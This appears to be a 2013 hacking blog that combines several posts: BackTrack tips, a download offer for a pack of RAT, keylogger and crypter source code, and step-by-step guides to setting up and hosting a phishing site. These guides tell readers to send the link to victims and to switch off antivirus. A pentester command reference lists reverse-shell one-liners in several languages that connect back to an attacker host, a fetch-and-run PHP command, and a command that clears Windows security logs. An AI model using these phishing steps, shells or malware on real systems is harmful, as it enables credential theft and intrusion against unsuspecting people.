Friday, May 31, 2013

USEFUL THINGS IN BACKTRACK LINUX



I'm trying to write 5 most useful things you should know in Backtrack Linux. Please check it below.


1. About user name and password Backtrack use root for the username and toor for the password. You should provide it at the first time login in your first time installation.


2. startx command Don't shocked if you see the black screen with command only when you use backtrack. Backtrack designed to use command line, but if you want to enable the window, you can type startx command after you log in.


3. Metasploit Framework The most famous tools in Backtrack is Metasploit framework, this tools is used for penetration testing into vulnerable system. You can go to metasploit framework by typing /pentest/exploits/framework3/msfconsole, and there's also /pentest/exploits/framework2/msfconsole.


4. Log Out In Backtrack you cannot restart or shutdown your computer from X-Window. One thing you can do when you finish use backtrack from X-Window is Log Out. To do this, click the Dragon icon at the bottom left of your Backtrack and then Click Log Out.


5. Shutdown and Restart When you finish use the X-Windows, you will be inside the terminal again. To shutdown your Backtrack : poweroff To restart your Backtrack : reboot That's it…very simple right? just try it yourself.

EVILGRADE 2.0 ERROR ON BACKTRACK 5 - SOLVED




I'm running Evilgrade on Backtrack 5 Evilgrade is a modular framework that allows the user to take advantage of poor upgrade implementations by injecting fake updates.


It comes with pre-made binaries (agents), a working default configuration for fast pentests, and has it's own WebServer and DNSServer modules. Easy to set up new settings, and has an autoconfiguration when new binary agents are set.


When I'm trying to running Evilgrade(./evilgrade), there's some error :


./evilgrade


Can't locate Data/Dump.pm in @INC (@INC contains: /etc/perl /usr/local/lib/perl/5.10.1 /usr/local/share/perl/5.10.1 /usr/lib/perl5 usr/share/perl5 /usr/lib/perl/5.10 /usr/share/perl/5.10 /usr/local/lib/site_perl .) at isrcore/Shell.pm line 28.


To solve this error, just run

cpan Data::Dump

in your terminal Finish

SECURE SOCKETS LAYER (SSL) - AN INTRODUCTION



In the OSI model a reference model for effective communication we find a layer named transport layer. Just like a physical layer (where viruses attack normally) transport layer also need some sort of security because transport layer is responsible for transmission of data.


So what actually makes transport layer to make the transmission secure and to protect the data from any intruder.


Have you ever noticed that when you visit some website it starts with http:// and whenever you visit some sort of money transfer and other important websites you find https:// point is clear https means a secure communication it means that your data that transfer from this connection secure by using some cryptography techniques.



SSL or secure sockets layer are cryptographic protocols that provide secure communication over the Internet. So what actually a cryptography is " Cryptography is a science of secrete communication".
SSL uses two keys to encrypt data − a public key known to everyone and a private or secret key known only to the recipient of the message.


                                                         HTTP VS HTTPS



The above picture shows that when ALICE sends the confidential information over insecure channel that there is a chance to sniff this confidential information (it might be a credit card information or may be your password etc). So the point is that an attacker can easily sniff this data and can easily read, understand and use for illegal activities because the data transfer in plain text regardless of any encryption it is simply a HTTP connection.

 



Now consider the second picture when an user send some sort of information over secure channel means if someone using HTTPS than the data first encrypt by using cryptography technique than it sends over channel, so in this case if someone sniff this data than he/she not able to understand it.


The above broad picture has clearly shows that HTTPS is secure, but how HTTPS is secure? Because it uses secure sockets layer (SSL). A website can implement HTTPS by purchasing an SSL Certificate.

Where there's a will there's a way. By following this amazing quote some researcher has discovered some ways to crack/hack SSL certificate too. To hack SSL certificate we will post an article later on.

Thursday, May 30, 2013

C# COLLECTION OF SOURCE CODES – MEGA PACK



I am posting a new pack, this time with C/C++ sources. Many people asked me for C/C++ pack, so here it is.. you can learn a lot from it.

The pack contains the following sources:
------------------------------------------------
Quote:

Port Scanner
Dark Crypter
FireFox 3.6 Decrypter
Agony
Aryan RAT v0.3
Aryan RAT v0.4
Aryan RAT v0.5
Basic Keylogger Source
Black Sun
BlindSpot v1.0 (Binder)
Files Merger
Call Of Duty 6 - Modern Warfare 2 - MPHack
Cryptic3 Crypter
DCI Bot
Down Trojan RAT
Client RAT
El Backdoor Small v1/2.0
Example Drag&Drop
F0xit 0.1
FBI RAT
gh0st 3.6
Harvecter bot
hBot Source
JABT1.2 - Justin Another Binder Tool
Juu2 IE7+FF steal
Little Joiner
Loading DLL infect PE
LocustPEA
Mail Sender - C++
Dump MSN Contacts
Nerzhul
Net Bot Attacker 5.5 RAT+DDOS
Polymorphic crypter
ProAgent V1.21
PsyRAT 2
Rat-b
Ratling
Reptile Bot
Rhapsody reverse connecting RAT
ri0tv5 Bot
UDP Tunnel
SpecialTrojan V5.0
Viotto OCX registrator - Source


Download link (mega pack of source codes):



MediaFire

Wednesday, May 22, 2013

How to make your computer a Server to host a website (Hosting a phishing website)

Steps to make your computer a server to host website from home:





1. Download WampServer and install it in your computer. If you don't know what it is, Wampserver is a simple server with PHP and mysql support which is fully capable of hosting sites in your home computer.


2. Create your website. If you want to make a phishing website within few minutes with both fake login page and php script, read my earlier article on Start Phishing any site in less than 5 minutes.


3. Copy your folder that contains your website files or phishing files and paste them inside "www" directory inside "wamp" folder. Typically it is in C:\wamp\www.


4. Now go to your browser and in the address bar, type "http://localhost". You will be prompted with your wamp page. Just scroll down and click on your folder that you copied in the www directory. That's it, you will see your website running.


5. Wait, it is right now only viewed from your computer. To make it visible to the world, you need to click on the wampserver icon on the taskbar, and then click on "put online".


6. If you have dynamic IP address thus making it difficult to host a website, just go to DynDns.org website. This website allows you to have a host name for dynamic IP address and the service is totally free. So just register with dyndns.org and get a host name for your computer so that even if your IP address changes, the service automatically updates the change to your host settings.


7. If you are behind the router, then you need to login to your router and on the port forwarding option, just write down your IP address and port.


That's it. If you follow these steps, you have successfully made your computer a server to host a phishing website or a legitimate website from home, within an hour. Enjoy!

Start phishing any site in less than 5 minutes

Phishing is certainly an exciting hacking arsenal for any hacker. It is completely a social engineering. It is an art of tricking the user to think that it is a legitimate website while we silently store the login information. So, today I am writing a tutorial on how to setup a complete phishing site so that you can start phishing in less than 5 minutes. So lets start.


First of all, you will need to make an exact replica of the website you are trying to perform phishing. Don't worry, we will use a simple tool that will do all the stuff. Secondly, you need a php script that logs in all the information typed by the user in the form. That's it.



You will need to download "automatic phish creator". The password of the rar file is "hackingguide". All you need to do is just fill in the website name you want to phish. Fill in the name of the php file you will get and the name of the log file you desire. The phishing creator will then create a exact replica of the website and a php script file. That's it. Now you are ready to start phishing.


Now, you will need to host your file to a server. You can use t35.com, awardspace.com or any similar hosts and register a free hosting space. Or you may buy a space. Its your choice. Now, go to the control panel and upload your two files. Then change the permission of the file to "777", i.e. full permission. Now, your site is ready for phishing. Send the link of your site to victims and then when people type in their credential thinking its a real site, you will have their username and password. It is this easy.


Note: Antivirus may alarm the phishing creator software. This is normal. Just turn of your antivirus while you are doing phishing and later turn it on after you are finished..

Tuesday, May 21, 2013

BACKBOX LINUX 3.0






A Linux distribution based on Ubuntu


BackBox is a Linux distro based on the Ubuntu operating system, developed to perform security assessments and penetration tests.

BackBox is designed to be easy to use and fast. It provides a minimal but powerful and complete desktop environment.

What's New in This Release: [ read full changelog ]

· System upgrade
· Bug corrections
· Performance boost
· Improved start menu
· Improved Wi-Fi dirvers (compat-wireless aircrack patched)
· New and updated hacking tools


HOW TO INSTALL FLASHPLAYER ON BACKTRACK 5







Install flash player on Backtrack 5 R2 step by step

Download the file below and click save to save the .deb file like shown in the screen shot

DOWNLOAD flash_player_10_linux.tar


Now type the below inside termianl, make sure you are in the downloads directory first do an ls if needed to make sure.

tar xvfz install_flash_player_10_linux.tar.gz


The result should look like the screenshot below if it went correctly



Now keep terminal open and type in the command below and press enter

mkdir ~/.mozilla/plugins



Last but not least type the command shown below into the same terminal window and press enter

mv -f libflashplayer.so ~/.mozilla/plugins/



Thats it, Flash Player should now be installed and working. Hope you enjoyed this tutorial and it helps someone out...

Sunday, May 12, 2013

Linux Hackers Command Reference

Linux Command Reference for Pen-testers



This part of the blog is dedicated to Linux and Unix-like commands that can be used from Penetration Testers (yea who is your tester?) and Information Security Administrators. In this page I will periodically post Linux tiny simple scripts and commands that a Penetration tester or a Security Administrator can use to:


1. Perform Administration Security tasks (e.g use windows/linux netcat to bind shells e.t.c).

2. Run Vulnerability Scans (e.g Identify null sessions, test for LANMAN services e.t.c).

3. Do pivoting (e.g after compromising a machine use windows tools to escalate e.t.c).



Using Netcat to Bind Shell




Launching a listening shell in windows and binding from linux:

nc.exe -L -p <listening port> -e cmd.exe - Running in windows box

nc <windows box ip> <windows port> - Run in Linux/Unix-like box

Launching a listening shell in Linux/Unix-like and binding from Windows:

nc -l -p <listening port> -e /bin/sh - Running in Linux/Unix-like box

nc.exe <linux box ip> <linux port> - Run in Windows box


Using Netcat to transfer files


This can be used to transfer types of files from Linux to windows: 

nc.exe -lvvp 4444 > output.txt - Running in the Linux/Unix-like box
cat input.txt | nc.exe -vv 192.168.8.74 4444 - Run in Windows box


This can be used to transfer all type of files from windows to Linux: 

nc.exe -lvvp 4444 > output.exe - Running in the Linux box
type input.exe | nc -vv <windows box ip> 4444 - Run in Windows box


Note:
You might want to run a file command to identify the type of the file you want to transfer. There is no difference between transferring binary and text files (most of the time).


Using Netcat for port scanning 

nc -v -n -z -w 1 192.168.1.2 1-1000 - Run from Linux/Unix-like box
nc.exe -v -n -z -w 1 192.168.1.2 1-1000 - Run from Linux/Unix-like box


Note: The "-n" parameter here prevents DNS lookup, "-z" makes nc not receive any data from the server, and "-w 1" makes the connection timeout after 1 second of inactivity. The commands above will scan from port 1 to 1000.

Using Python to get shell

This was tested under Linux / Python 2.7:

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

Using PHP to get shell

This code assumes that the TCP connection uses file descriptor 3. This worked on my test system. If it doesn’t work, try 4, 5, 6…

php -r '$sock=fsockopen("10.0.0.1",1234);exec("/bin/sh -i <&3 >&3 2>&3");'


Using Ruby to get shell

This shell binds a shell in port 1234 (good for installed ruby in the victim machine):

ruby -rsocket -e'f=TCPSocket.open("10.0.0.1",1234).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)' 
Using Java to get shell 
The following command opens a listening shell in 10.0.0.1:

r = Runtime.getRuntime()
p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/10.0.0.1/2002;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[])
p.waitFor()


Using Perl to get shell

And a shorter Perl reverse shell that does not depend on /bin/sh:

perl -MIO -e '$p=fork;exit,if($p);$c=new IO::Socket::INET(PeerAddr,"attackerip:4444");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;' 

If the target system is running Windows use the following one-liner:

perl -MIO -e '$c=new IO::Socket::INET(PeerAddr,"attackerip:4444");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'

Alternatives to Bash Shell

Here are some tricks taken from Dameles blog to play with.

exec /bin/bash 0&0 2>&0

Or:

0<&196;exec 196<>/dev/tcp/attackerip/4444; sh <&196 >&196 2>&196

Or:

exec 5<>/dev/tcp/attackerip/4444
cat <&5 | while read line; do $line 2>&5 >&5; done # or:
while read line 0<&5; do $line 2>&5 >&5; done


Using Telnet to get shell


Of course, you can also use Telnet as an alternative for Netcat:

rm -f /tmp/p; mknod /tmp/p p && telnet attackerip 4444 0/tmp/p

Or:

telnet attackerip 4444 | /bin/bash | telnet attackerip 4445 

Note: Remember to listen on your machine also on port 4445/tcp

Using sbd to get shell

An article on http://www.secureit.co.il discussed the availability of sbd (Shadowinteger's Backdoor), available at http://cycom.se/dl/sbd. It is described as a ‘Netcat- clone, designed to be portable and offer strong encryption’. It supports aes-128 encryption and is available on most platforms, including win32 and Linux.
Command with no encryption for listening in Windows: sbd.exe –l –p 5555 –c off
Command with encryption for listening in Windows: sbd.exe –l –p 5555 –c on
Binding a shell to Windows machine with encryption: sbd.exe –l –p 5555 –c on –e cmd.exe
Binding a shell to Windows machine with encryption: sbd.exe –l –p 5555 –c off –e cmd.exe
Command with no encryption for connecting to Windows from Linux: sbd 192.168.11.21 5555 –c off
Command with encryption for connecting to Windows with Linux: sbd 192.168.1.21 5555 –c on
This command will monitor traffic at the server side: sbd -m on -r 0 -l -p 100 -e cmd.exe
This command will cause a port forwarding: sbd 127.0.0.1 2000 | cmd.exe | sbd 127.0.0.1 3000
This command will do perform a connection forwarding: sbd -vv -l -p 90 | sbd -c off www.radarhack.com 80

Note:
The example of the reverse shell should prove that a decent configuration of firewalls in the outbound direction is necessary. In the scenario that a Trojan can be installed on a webserver, it is very important to prevent that this server can connect back out of the network, resulting in a shell for the attacker.

Using sbd to transfer file

For file receiving in Windows the command is: sbd.exe –l –p 5555 > output.txt
For file sending in Linux the command is: cat input.txt | sbd 192.168.11.21 5555


Note: There is not difference in transferring an executable or simply a text file.

Using sbd to respawn the shell

Another interesting feature of sbd if the -r option that allows you to respawn the shell. From the moment the client disconnects, the server side will exit. In order to respawn the server, specify the -r seconds’ switch. The server will be listening a gain after the specified amount of time. This might prevent the backdoor from existing and prevent to reconnect. Specifying a time of 0 seconds, will respawn the server immediately.
Here is a typical interaction with sbd respawning the shell after the connection is droped:

sbd -r 8 f -P server -l -p 100

demolisher: test1

demolisher: test2

sbd -P demolisher 127.0.0.1 100

test1

^C

sbd -P demolisher 127.0.0.1 100

connect(): WSAECONNREFUSED

sbd -P demolisher 127.0.0.1 100

connect(): WSAECONNREFUSED

... after 8 seconds ....

sbd -P demolisher 127.0.0.1 100

test2

After evaluating (or playing in other words), the tool seems very useful and easy to use. It contains (much) less features than netcat, although it offers build-in encryption, which can be useful to avoid IDS/IPS systems, although some will detect malicious behavior, if used on well-known ports.

Useful commands for copy paste

nc &lt;attacker_ip&gt; &lt;port&gt; -e /bin/bash
mknod backpipe p; nc &lt;attacker_ip&gt; &lt;port&gt; 0&lt;backpipe | /bin/bash 1&gt;backpipe
/bin/bash -i &gt; /dev/tcp/&lt;attacker_ip&gt;/&lt;port&gt; 0&lt;&1 2&gt;&1
mknod backpipe p; telnet &lt;attacker_ip&gt; &lt;port&gt; 0&lt;backpipe | /bin/bash 1&gt;backpipe
telnet &lt;attacker_ip&gt; &lt;1st_port&gt; | /bin/bash | telnet &lt;attacker_ip&gt; &lt;2nd_port&gt;
wget -O /tmp/bd.php &lt;url_to_malicious_file&gt; && php -f /tmp/bd.php

References:
http://pentestmonkey.net
http://wikipedia.org
blog

Windows Auditing

   Windows Auditing

Introduction 

This post is a comprehensive list of the things you would want to check while conducting Windows auditing.

Step 1:

Explanation: List all installed programs (after you cd to C:\Program Files)

Command: dir /p /n > Path\<output-file>
Command: tree /A /F > Path\<output-file>


Step 2:

Explanation: List security policies

Command: auditpol /get /category:* (as Admnistrator)
Command: auditpol /backup /file:c:\<output>.csv (as Admnistrator)

Step 3a:

Explanation: List Windows running/stopped services

Command: sc query type= service > Path\<output-file>
Command: sc query type= service state= inactive > Path\<output-file>
Command: sc query type= service state= all > Path\<output-file> (running and not running)
Command: net start > Path\<output-file>


Step 3b:

Explanation: List Windows service running privilages

Command: sc qprivs <service name> > Path\<output-file>


Step 4:

Explanation: Identifying the windows security patches using WMIC

Command: wmic qfe get description,installedOn > Path\<output-file>


Step 5:

Explanation: List Windows processes with relevant information

Command: wmic process > Path\<output-file>
Command: wmic process list brief > Path\<output-file>
Command: wmic process list full > Path\<output-file>
Command: wmic process list system > Path\<output-file>


Step 6:

Explanation: List Windows startup programs

Command: wmic startup > Path\<output-file>
Command: wmic startup list full > Path\<output-file>
Command: wmic startup list brief > Path\<output-file>
Command: wmic startup list system > Path\<output-file>


Step 7:
Explanation: List Windows current connections with ownership

Command: netstat -nab > Path\<output-file>

Saturday, May 11, 2013

Windows Hackers Command Reference

Windows Command Reference for Pen-testers





This part of the blog is dedicated to Windows commands that can be used from Penetration Testers (yea who is your tester?) and Information Security Administrators. In this page I will periodically post Windows tiny simple scripts and commands that a Penetration tester or a Security Administrator can use to:

1. Perform Administration Security tasks (e.g do patch enforcement, silently uninstall software e.t.c).

2. Run Vulnerability Scans (e.g Identify null sessions, test for LANMAN services e.t.c).

3. Do pivoting (e.g after compromising a machine use windows tools to escalate e.t.c).



Test for installed patches 

In order to run WMIC you just open up a command prompt and type wmic and you imminently get an interactive command shell with root accesses.

Identifying the windows security patches using WMIC
wmic qfe get description,installedOn

Note: This produces a long list of Windows Patches and when they were installed and exports the results in stdout. That way you know exactly how to attack the workstation or perform remediation to a workstation.


Identifying windows services 

1.  sc query type= service (running services) 
2. sc query type= service state= inactive (exist but don't run)
3. sc query type= service state= all (running and not running)


Identifying windows startup programs

This commands are reporting the start up programs: 

1. wmic startup
2. wmic startup list full
3. wmic startup list brief
4. wmic startup list system


Note: This commands produces a list with all start up programs along with their registry keys, a program description and program name. The options shown above give you various output. Very interesting when doing malware behavioral analysis. 

1. wmic /node:machinename startup list full
2. wmic STARTUP GET Caption, Command, User

Note: Remotely list startup apps


Identifying windows network cards 

WMIC can also give you lots of information about the network cards and drivers: 

1. wmic nicconfig list
Note: That will give you a list of all network drivers 

1. wmic nicconfig where IPEnabled='true'

Note: That will give you a list of IP interfaces. 

1. wmic nicconfig where index=9 call enablestatic("192.168.16.4"), ("255.255.255.0")

Note: This will update static IP address 

1. wmic nicconfig where index=9 call setgateways("192.168.16.4", "192.168.16.5"),(1,2)

Note: This will Change network gateway 

1. wmic nicconfig where index=9 call enabledhcp

Note: This will enable DHCP. 

1. wmic service where caption="DHCP Client" call changestartmode "Disabled"
2. wmic service where caption="DHCP Client" call changestartmode "Automatic"
3. wmic service where caption="DHCP Client" call changestartmode "Manual"
Note: This will enable DHCP make disable, automatic or manual the service. 

1. wmic /node:machinename nicconfig where Index=1 call EnableDHCP

Note: Remotely change IP to use DHCP 

1. wmic /node:machinename nicconfig where Index=1 call EnableStatic ("172.16.10.10"), ("255.255.0.0")

Note: Remotely change the IP to a static IP (Index is Interface#)



Handle Windows Process life-cycle 

The above sets of commands lets you handle all type of process manipulation: 

1. wmic process
2. wmic process list brief
3. wmic process list full
4. wmic process list system

Note: The above commands list processes in a windows machine. 

1. wmic /record:processes.xml process list brief
2. wmic /record:processes.xml process list full
3. wmic /record:processes.xml process list system

Note: After the command runs, your results are stored in xml format. That's the only format supported, but this is a handy record of what you typed, when you typed it, and the results you got. 

1. wmic process where name='process_name.exe'
2. wmic process where name='process_name.exe' list brief
3. wmic process where name='process_name.exe' list full
4. wmic process where name='process_name.exe' list system
5. wmic process where name='process_name.exe' delete

Note:The above let you commands search/kill and create processes based on their name. 

1.
wmic process | more


Note: Displays all processes per screen page 

1. wmic process | findstr "process name"

Note: The above command searches a process name, or process information per line.

1. wmic /output:wmic.html process list full /format:hform

Note: List running processes and output to HTML/XSL form. 

1. wmic /node:machinename process list brief /every:1

Note: Remotely list running processes every second 

1.
wmic process where name="cmd.exe" call getowner
2. wmic process where name="cmd.exe" call getownersid

Note: Get Process Owner or OwnerSID.You can use that to migrate using metasploit to some useful process.


ICMP and DNS network sweeping 


After taking over a windows box you can use it as a pivot, but what happens if it is a restricted box and you cannot download or upload any tools? Well the following commands will do the job: 

for /L %I in (1,1,254) DO @ping -n 1 192.168.1.%I | findstr "TTL=128" >> pinglog.txt

Note: This command sequence will ping sending only one package and report this machine that have a none zero TTL field. The output of the loop will be stored in a file named pinglog.txt. 

for /L %I in (1,1,254) DO @nslookup 192.168.1.%I | find "Name:" >> dnslog.txt
Note: This command sequence will perform a reverse DNS lookup using the local DNS server (an external dns server can be sued also). The output will be stored in a log file called dnslog.txt
pathping targethost (for a single host only) 

for /L %I in (1,1,254) DO @pingpath -n 192.168.1.%I >> traceping.txt

Note: This command combines functions of Ping and Tracert. Pathping will first list the number of hops required to reach the address you are testing and then send multiple pings to each router between you and the destination. After that, it computes results based on the packets returned from each router. Because pathping displays the degree of packet loss at any given router or link, you can determine which routers or subnets might be having network problems. Note that the whole process may consume 5-10 minutes because many pings are being sent. There are switches to modify the process and these can be seen by entering "pathping /?" in the command prompt.The command sequence above will map the whole network along with their routes (this is going to be verbose).

for /L %I in (1,1,254) DO @echo -Route: %I- >> trace.txt & @pathping -n 1 192.168.1.%I >> trace.txt 

Note: This will do a simple trace routing of the whole local network.

Windows network connection monitoring 

1. netstat -nab 3 >> netstat.txt

Note: This will perform an infinite loop with all listening ports and the executable engaged with a refresh rate of 3 seconds. More specifically:

1. Option: -n

Displays addresses and port numbers in numerical form 

1. Option: -a

Displays all connections and listening ports

1. Option: -b

Displays the executable involved in creating each connection or listening port. In some cases well-known executables host multiple independent components, and in these cases the sequence of components involved in creating the connection or listening port is displayed. In this case the executable name is in [] at the bottom, on top is the component it called, and so forth until TCP/IP was reached. Note that this option can be time-consuming and will fail unless you have sufficient permissions.

Important 

Note: This tool is very good for identifying malware behavior that does not alter any system functions, because in case you try to disinfect a rootkit it will not be much of a help :).


Handling Windows Users

The following examples displays a list of all user accounts for the local computer (some commands do that along with other useful information): 

1.
net user
2. wmic useraccount
3. wmic useraccount list brief
The following example displays information about the user account someuser:

1. net user someuser

The following example adds a user account for a user whose full name is Jay Jamison and whose user account name is jayj, with logon rights from 8 A.M. to 5 P.M., Monday through Friday (no spaces in time designations), a mandatory password (Cyk4^g3B), and the user's full name:

1. net user jayj Cyk4^g3B /add /passwordreq:yes /times:monday-friday,8am-5pm /fullname:"Jay Jamison
or

1. Simple add user: net user someuser /add

2. net user miked /time:M-F,08:00-17:00

Note: Sets the logon time (8 A.M. to 5 P.M.) for miked by using 24-hour notation:

1.
net user miked /time:M-F,8AM-5PM

Note: Sets the logon time (8 A.M. to 5 P.M.) for miked by using 12-hour notation:

1. net user anibals /time:M,4AM-5PM;T,1PM-3PM;W-F,8:00-17:00

Note: Specifies logon hours of 4 A.M. until 5 P.M. on Monday, 1 P.M. until 3 P.M. on Tuesday, and 8 A.M. until 5 P.M. Wednesday through Friday for anibals:

1. wmic /node:remotecomputer computersystem get username 

Note: Determine user currently logged in remotely.

List Event Logs  

1. wmic ntevent list brief --- Brief takes a while, full takes even longer
2. wmic nteventlog where (description like "%secevent%") call clearevent

List Services  

1. wmic service list brief
2. Delete ARPCache
3. netsh int ip delete arpcache
Auditing the security policies

Applies To: Windows 7, Windows Server 2008, Windows Server 2008 R2, Windows Vista Displays information about and performs functions to manipulate audit policies.For examples of how this command can be used, see the Examples section in each topic.
Auditpol /get /user:{S-1-5-21-1443922412-3030960370-963420232-51} /category:"System","Detailed Tracking","Object Access"

Reboot or Shutdown a box

1. wmic os where buildnumber="2600" call reboot -- Get build# from OS Info (see below)
2. shutdown -r -f -t 2
3. shutdown -s -f -t 4

Reference:

http://technet.microsoft.com
http://isc.sanc.edu
http://commandwindows.com
http://technet.microsoft.com/
http://theinterw3bs.com

    Owasp Xenotix XSS Exploit Framewor


    Xenotix XSS Exploit Framework is a penetration testing tool to detect and exploit XSS vulnerabilities in Web Applications. This tool can inject codes into a webpage which are vulnerable to XSS. It is basically a payload list based XSS Scanner. It provides a penetration tester the ability to test all the possible XSS payloads available in the payload list against a web application with ease. The tool supports both manual mode and automated time sharing based test modes. It includes a XSS encoder, a victim side keystroke logger, and an Executable Drive-by downloader.


    Features:

    * Built in XSS Payloads

    * XSS Key logger

    * XSS Executable Drive-by downloader

    * Automatic XSS Testing

    * XSS Encoder


    Download: https://www.owasp.org

    jSQL Injection - Java GUI for database injection.



    An easy to use SQL injection tool for retrieving database informations from a distant server.

    Running injection requires the distant server url and the name of parameter to inject.

    jSQL Injection features:

    * GET, POST, header, cookie methods
    * visual, error based, blind algorithms
    * automatic best algorithms detection
    * data retrieving progression
    * proxy settings

    For now supports only MySQL.


    Download: http://code.google.com/

    Smartphone Pentest Framework v.0.1




    The Smartphone Pentest Framework (SPF) is an open source tool designed to allow users to assess the security posture of the smartphones deployed in an environment. The tool allows for assessment of remote vulnerabilities, client side attacks, social engineering attacks, post exploitation and local
    privilege escalation. This is an initial release, with a subset of features from each section. SPF is the
    product of DARPA Cyber Fast Track grant.

    SPF is made up of several parts that may be mixed and matched to meet users' needs. SPF v0.1 includes the following:


    • SPF Console

    • SPF Web based GUI

    • SPF Android App

    • SPF Android Agent


    Download: https://github.com

    Demo: http://vimeo.com

    Friday, May 10, 2013

    Snuck - Automatic XSS filter bypass tool




    snuck is an automated tool that may definitely help in finding XSS vulnerabilities in web applications. It is based on Selenium and supports Mozilla Firefox, Google Chrome and Internet Explorer. The approach, it adopts, is based on the inspection of the injection's reflection context and relies on a set of specialized and obfuscated attack vectors for filter evasion. In addition, XSS testing is performed in-browser, a real web browser is driven for reproducing the attacker's behavior and possibly the victim's.


    snuck is quite different from typical web security scanners, it basically tries to break a given XSS filter by specializing the injections in order to increase the success rate. The attack vectors are selected on the basis of the reflection context, that is the exact point where the injection falls in the reflection web page's DOM. Having access to the pages' DOM is possible through Selenium Web Driver, which is an automation framework, that allows to replicate operations in web browsers. Since many steps could be involved before an XSS filter is "activated", an XML configuration file should be filled in order to make snuck aware of the steps it needs to perform with respect to the tested web application. Practically speaking, the approach is similar to the iSTAR's one, but it focuses on one particular XSS filter.


    Download: http://code.google.com/

    Subterfuge Beta Version 4.2 Released

                                               Automated Man-in-the-Middle Attack Framework 





    Abstract: 


    Enter Subterfuge, a Framework to take the arcane art of Man-in-the-Middle Attack and make it as simple as point and shoot. A beautiful, easy to use interface which produces a more transparent and effective attack is what sets Subterfuge apart from other attack tools. Subterfuge demonstrates vulnerabilities in the ARP Protocol by harvesting credentials that go across the network, and even exploiting machines through race conditions. Now walk into a corporation… A rapidly-expanding portion of today’s Internet strives to increase personal efficiency by turning tedious or complex processes into a framework which provides instantaneous results.


    On the contrary, much of the information security community still finds itself performing manual, complicated tasks to administer and protect their computer networks. Given the increase in automated hacking tools, it is surprising that a simplistic, “push-button” tool has not been created for information security professionals to validate their networks’ ability to protect against a Man-In-The-Middle attack. Subterfuge is a small but devastatingly effective credential-harvesting program which exploits a vulnerability in the Address Resolution Protocol. It does this in a way that a non-technical user would have the ability, at the push of a button, to harvest all of the usernames and passwords of victims on their connected network, thus equipping information and network security professionals with a “push-button” security validation tool.


    Download: http://code.google.com/p/subterfuge

    Subterfuge DEFCON 20 Teaser: http://www.youtube.com

    Cookie Cadger v.0.9



    An auditing tool for Wi-Fi or wired Ethernet connections

    Cookie Cadger helps identify information leakage from applications that utilize insecure HTTP GET requests.

    Cookie Cadger works on Windows, Linux, or Mac, and requires Java 7. Using Cookie Cadger requires having “tshark” – a utility which is part of the Wireshark suite, to be installed. Usually simply installing Wireshark will be sufficient. Additionally, to capture packets promiscuously requires compatible hardware. Capturing Wi-Fi traffic requires hardware capable of monitor mode, and the knowledge of how to place your device into monitor mode.

    Download:
    https://www.cookiecadger.com

    Thursday, May 9, 2013

    The Teenage Mutant Ninja Turtles project



    The Teenage Mutant Ninja Turtles project is four things:
    1-A Web Application payload database.
    2-A Web Application error database.
    3-A Web Application payload mutator.
    4-A Web Application payload manager (e.g. does database clean up).

    Nowadays all high profile sites found in financial and telecommunication sector use filters to filter out all types of vulnerabilities such as SQL, XSS, XXE, Http Header Injection e.t.c. In this particular project I am going to provide you with a tool to generate Obfuscated Fuzzing Injection attacks on order to bypass badly implemented Web Application injection filters (e.t.c SQL Injections, XSS Injections e.t.c).


    Download: http://code.google.com

    More Info: http://code.google.com

    Obfuscate SQL Fuzzing for fun and profit

    Introduction

    Now days cyber criminals are increasingly using automated SQL injection attacks powered by botnets to hit vulnerable systems. SQL injection attacks is the prevalent way of attacking front-end Web applications and back-end databases to compromise data confidentiality. Recently published reports by the Web Hacking Incidents Database (WHID) shows SQL injections as the top attack vector, making up 19 percent of all security breaches examined by WHID. Open Web Application Security Project (OWASP) top 10 risk categorization chart, rates SQL injection risk as number one threat along with operating system command injection and LDAP injection attack.

    But why does this happen? Have you ever thought about it? Well the answer is easy, we're seeing such an increase in SQL injection incidents because we have an "industrialization of hacking". SQL injection attacks are generally carried out by typing malformed "SQL commands into front-end Web application input boxes" that are tied to database accounts in order to trick the database into offering more access to information than the developer intended. Part of the reason for such a huge rise in SQL injection attacks is that the last years criminals are increasingly using automated and manual SQL injection attacks powered by botnets or professional hackers to hit vulnerable systems. They use the attacks to both steal information from databases and to inject malicious code into these databases as a means to perpetrate further attacks.

    Why SQL injection attacks still exist

    SQL injection attacks happen because of badly implemented Web Application filters, meaning that the web application will often fail to properly sanitize malicious user input. You can usually find this type of badly implemented SQL injection filters in outsourced web applications to India, Asia or other possibly third world countries, that developers are not aware of what SQL injection proper filtering is. Most of the time well known large organizations from the financial sector will create a large team of functional and security testers and then outsource the project in order to reduce the development cost, at the same time they would try to maintain and increase the control of the web application development progress and quality assurance process. Unfortunately this is not easy to happen or even possible due to bad management procedures or lack of security awareness from the side of the developers. The main mistake the developers do is that they are looking for a quick fix, for example they might think that placing a Web Application Firewall (WAF) in-front of a web application and apply black list filtering will solve the problem.

    That is wrong because SQL injection attacks can be obfuscated and relatively easy bypass these quick fixes. Obfuscating SQL injections attacks nowadays is a de facto standard for penetration testing and has been used by well known web malware such as ASPRox. The Asprox botnet (Discovered around 2008), also known by its aliases Badsrc and Aseljo, is a botnet mostly involved in phishing scams and performing SQL Injections into websites in order to spread Malware. Since its discovery in 2008 the Asprox botnet has been involved in multiple high-profile attacks on various websites in order to spread malware. The botnet itself consists of roughly 15,000 infected computers as of May, 2008 although the size of the botnet itself is highly variable as the controllers of the botnet have been known to deliberately shrink (and later regrow) their botnet in order to prevent more aggressive countermeasures from the IT Community. ASPRox used extensively automated obfuscated SQL injection attacks, in order to better understand what SQL obfuscation means, within the context of computer security, you should consider obfuscated SQL injection attacks as a similar technique to virus polymorphism.

    Why obfuscate SQL injection

    This article is going to talk about Obfuscated SQL Injection Fuzzing. Nowadays all high profile sites found in financial and telecommunication sector use filters to filter out all types of vulnerabilities such as SQL, XSS, XXE, Http Header Injection e.t.c. In this particular article we are going to talk only about Obfuscated SQL Fuzzing Injection attacks.

    First of all what obfuscate means based on the Dictionary.com:

    "Definition of obfuscate: verb (used with object), ob·fus·cat·ed, ob·fus·cat·ing.

